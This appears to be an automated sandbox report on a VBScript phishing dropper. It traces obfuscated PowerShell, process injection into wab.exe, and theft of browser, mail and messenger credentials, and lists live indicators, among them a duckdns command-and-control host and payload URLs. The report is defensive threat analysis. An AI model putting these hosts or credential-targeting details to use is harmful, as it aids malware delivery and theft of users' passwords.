                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_20EA2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_20EA2264
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,17_2_004082CD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0041739B GetVersionExW,16_2_0041739B
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2264, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword17_2_004033F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword17_2_00402DB3
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword17_2_00402DB3
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2264, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5664, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2264, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information321
                Scripting
                Valid Accounts11
                Windows Management Instrumentation
                321
                Scripting
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                3
                Obfuscated Files or Information
                11
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution
                1
                Registry Run Keys / Startup Folder
                212
                Process Injection
                1
                Software Packing
                2
                Credentials in Registry
                2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts212
                Command and Scripting Interpreter
                Login Hook1
                Registry Run Keys / Startup Folder
                1
                DLL Side-Loading
                1
                Credentials In Files
                129
                System Information Discovery
                Distributed Component Object Model11
                Input Capture
                2
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell
                Network Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets341
                Security Software Discovery
                SSH2
                Clipboard Data
                213
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Modify Registry
                Cached Domain Credentials141
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                Virtualization/Sandbox Evasion
                DCSync4
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465344 Sample: TOP URGENT PURCHASE ORDER S... Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 47 janbours92harbu02.duckdns.org 2->47 49 geoplugin.net 2->49 51 contemega.com.do 2->51 71 Snort IDS alert for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 79 13 other signatures 2->79 11 wscript.exe 1 2->11         started        signatures3 77 Uses dynamic DNS services 47->77 process4 signatures5 81 VBScript performs obfuscated calls to suspicious functions 11->81 83 Suspicious powershell command line found 11->83 85 Wscript starts Powershell (via cmd or directly) 11->85 87 5 other signatures 11->87 14 powershell.exe 14 19 11->14         started        process6 dnsIp7 57 contemega.com.do 192.185.112.252, 443, 49715, 50573 UNIFIEDLAYER-AS-1US United States 14->57 95 Suspicious powershell command line found 14->95 97 Obfuscated command line found 14->97 99 Very long command line found 14->99 101 Found suspicious powershell code related to unpacking or dynamic code loading 14->101 18 powershell.exe 17 14->18         started        21 conhost.exe 14->21         started        23 cmd.exe 1 14->23         started        signatures8 process9 signatures10 65 Writes to foreign memory regions 18->65 67 Found suspicious powershell code related to unpacking or dynamic code loading 18->67 69 Hides threads from debuggers 18->69 25 wab.exe 5 15 18->25         started        30 cmd.exe 1 18->30         started        process11 dnsIp12 53 janbours92harbu02.duckdns.org 206.123.148.194, 3980, 50575, 50576 M247GB United States 25->53 55 geoplugin.net 178.237.33.50, 50577, 80 ATOM86-ASATOM86NL Netherlands 25->55 45 C:\Users\user\AppData\Roaming\kpburtts.dat, data 25->45 dropped 89 Maps a DLL or memory area into another process 25->89 91 Hides threads from debuggers 25->91 93 Installs a global keyboard hook 25->93 32 wab.exe 1 25->32         started        35 wab.exe 1 25->35         started        37 wab.exe 2 25->37         started        39 2 other processes 25->39 file13 signatures14 process15 signatures16 59 Tries to steal Instant Messenger accounts or passwords 32->59 61 Tries to steal Mail credentials (via file / registry access) 32->61 63 Tries to harvest and steal browser information (history, passwords, etc) 35->63 41 conhost.exe 39->41         started        43 reg.exe 1 1 39->43         started        process17

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs8%ReversingLabsWin32.Trojan.Generic
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://contoso.com/License0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                https://contemega.com.do/New/New/P0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpVp0%Avira URL Cloudsafe
                http://www.imvu.comr0%Avira URL Cloudsafe
                https://contemega.com.do/New/0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
                https://go.micro0%URL Reputationsafe
                https://contemega.com.do/New/New/Pu0%Avira URL Cloudsafe
                https://contemega.com.do/New/New/Pustene.lpk0%Avira URL Cloudsafe
                https://contemega.com.d0%Avira URL Cloudsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://crl.microsoft0%Avira URL Cloudsafe
                https://contemega.c0%Avira URL Cloudsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://geoplugin.net/json.gpIp0%Avira URL Cloudsafe
                janbours92harbu02.duckdns.org100%Avira URL Cloudmalware
                https://contemega.com.do/N0%Avira URL Cloudsafe
                http://www.nirsoft.net0%Avira URL Cloudsafe
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                https://contemega.com.do0%Avira URL Cloudsafe
                https://contemega.com.do/New/New/Puste0%Avira URL Cloudsafe
                https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
                https://contemega.com.do/New/New/Pus0%Avira URL Cloudsafe
                https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL0%Avira URL Cloudsafe
                https://www.google.com0%Avira URL Cloudsafe
                https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat0%Avira URL Cloudsafe
                https://contemega.com.do/New/New/Pustene.lp0%Avira URL Cloudsafe
                https://contemega.com.do/New/New0%Avira URL Cloudsafe
                https://contemega.com.do/New0%Avira URL Cloudsafe
                https://contemega.com.do/0%Avira URL Cloudsafe
                http://www.microsoft.co00%Avira URL Cloudsafe
                http://geoplugin.net/json.gp%p0%Avira URL Cloudsafe
                https://contemega.com.0%Avira URL Cloudsafe
                https://login.yahoo.com/config/login0%Avira URL Cloudsafe
                https://contemega.com.do/New/New/Pustene.lpkXR)l0%Avira URL Cloudsafe
                http://www.nirsoft.net/0%Avira URL Cloudsafe
                https://contemega.com.do/New/New/0%Avira URL Cloudsafe
                https://contemega.com.do/New/New/Pustene.lpk0z0%Avira URL Cloudsafe
                https://contemega.com.do/New/New/Pustene.0%Avira URL Cloudsafe
                https://contemega.com.do/New/N0%Avira URL Cloudsafe
                https://contemega.P0%Avira URL Cloudsafe
                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&0%Avira URL Cloudsafe
                https://contemega.co0%Avira URL Cloudsafe
                https://contemega.com.do/New/New/mVbkq170.bin0%Avira URL Cloudsafe
                https://go.mic0%Avira URL Cloudsafe
                http://www.imvu.compData0%Avira URL Cloudsafe
                https://www.office.com/0%Avira URL Cloudsafe
                http://microsoft.co0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=wsb0%Avira URL Cloudsafe
                http://www.imvu.com0%Avira URL Cloudsafe
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg0%Avira URL Cloudsafe
                https://contemega.com.do/New/New/Pust0%Avira URL Cloudsafe
                https://contemega.com.do/Ne0%Avira URL Cloudsafe
                https://github.com/Pester/Pester0%Avira URL Cloudsafe
                http://contemega.com.do0%Avira URL Cloudsafe
                https://contemega.com.do/New/New/Pustene.l0%Avira URL Cloudsafe
                https://contemega.com.do/New/New/Pusten0%Avira URL Cloudsafe
                https://contemega.com.do/New/New/Pustene0%Avira URL Cloudsafe
                http://geoplugin.net/json.gp.p0%Avira URL Cloudsafe
                http://geoplugin.net/0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingaot0%Avira URL Cloudsafe
                http://geoplugin.net/json.gpal0%Avira URL Cloudsafe
                https://contemega.com.do/New/Ne0%Avira URL Cloudsafe
                https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
                https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                https://contemega.com0%Avira URL Cloudsafe
                http://crl.micros0%Avira URL Cloudsafe
                https://contemega.com.do/New/New/mVbkq170.binN0%Avira URL Cloudsafe
                http://www.ebuddy.com0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                janbours92harbu02.duckdns.org
                206.123.148.194
                truetrue
                  unknown
                  geoplugin.net
                  178.237.33.50
                  truefalse
                    unknown
                    contemega.com.do
                    192.185.112.252
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://contemega.com.do/New/New/Pustene.lpkfalse
                      • Avira URL Cloud: safe
                      unknown
                      janbours92harbu02.duckdns.orgtrue
                      • Avira URL Cloud: malware
                      unknown
                      https://contemega.com.do/New/New/mVbkq170.binfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://geoplugin.net/json.gpfalse
                      • URL Reputation: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.imvu.comrwab.exe, 0000000B.00000002.3444547352.0000000020E70000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contemega.com.do/New/powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contemega.com.do/New/New/Ppowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://geoplugin.net/json.gpVpwab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.microsoftpowershell.exe, 00000005.00000002.2558083418.00000000077B6000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://aefd.nelreports.net/api/report?cat=bingthbhv88BF.tmp.16.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contemega.com.dpowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contemega.cpowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contoso.com/Licensepowershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contemega.com.do/New/New/Pupowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contemega.com.do/Npowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contemega.com.dopowershell.exe, 00000002.00000002.2605528910.000001DB95F84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2605528910.000001DB977C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://geoplugin.net/json.gpIpwab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.nirsoft.netwab.exe, 00000010.00000002.2602811179.0000000002DD4000.00000004.00000010.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://aefd.nelreports.net/api/report?cat=bingaotakbhv88BF.tmp.16.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contemega.com.do/New/New/Pustepowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://deff.nelreports.net/api/report?cat=msnbhv88BF.tmp.16.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contemega.com.do/New/New/Puspowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 0000000B.00000002.3444547352.0000000020E70000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contemega.com.do/powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3429074546.0000000005068000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3429074546.0000000005038000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contemega.com.do/New/New/Pustene.lppowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.comwab.exe, wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELbhv88BF.tmp.16.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contemega.com.do/New/Newpowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2550349673.0000000004E11000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.microsoft.co0powershell.exe, 00000002.00000002.2679653181.000001DBAE348000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv88BF.tmp.16.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contoso.com/powershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2668709649.000001DBA5DCE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2555412225.0000000005FB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2555412225.0000000005E76000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contemega.com.powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://geoplugin.net/json.gp%pwab.exe, 0000000B.00000003.2574264775.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2567181749.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3430254752.00000000050D0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contemega.com.do/Newpowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://login.yahoo.com/config/loginwab.exefalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contemega.com.do/New/New/Pustene.lpkXR)lpowershell.exe, 00000005.00000002.2550349673.0000000004F65000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.microsoft.cpowershell.exe, 00000002.00000002.2679653181.000001DBAE348000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://contemega.com.do/New/Npowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.nirsoft.net/wab.exe, 00000012.00000002.2582285664.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contemega.com.do/New/New/powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2605528910.000001DB95D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2550349673.0000000004E11000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contemega.copowershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contemega.com.do/New/New/Pustene.powershell.exe, 00000002.00000002.2605528910.000001DB96FB6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contemega.com.do/New/New/Pustene.lpk0zpowershell.exe, 00000002.00000002.2605528910.000001DB95F84000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
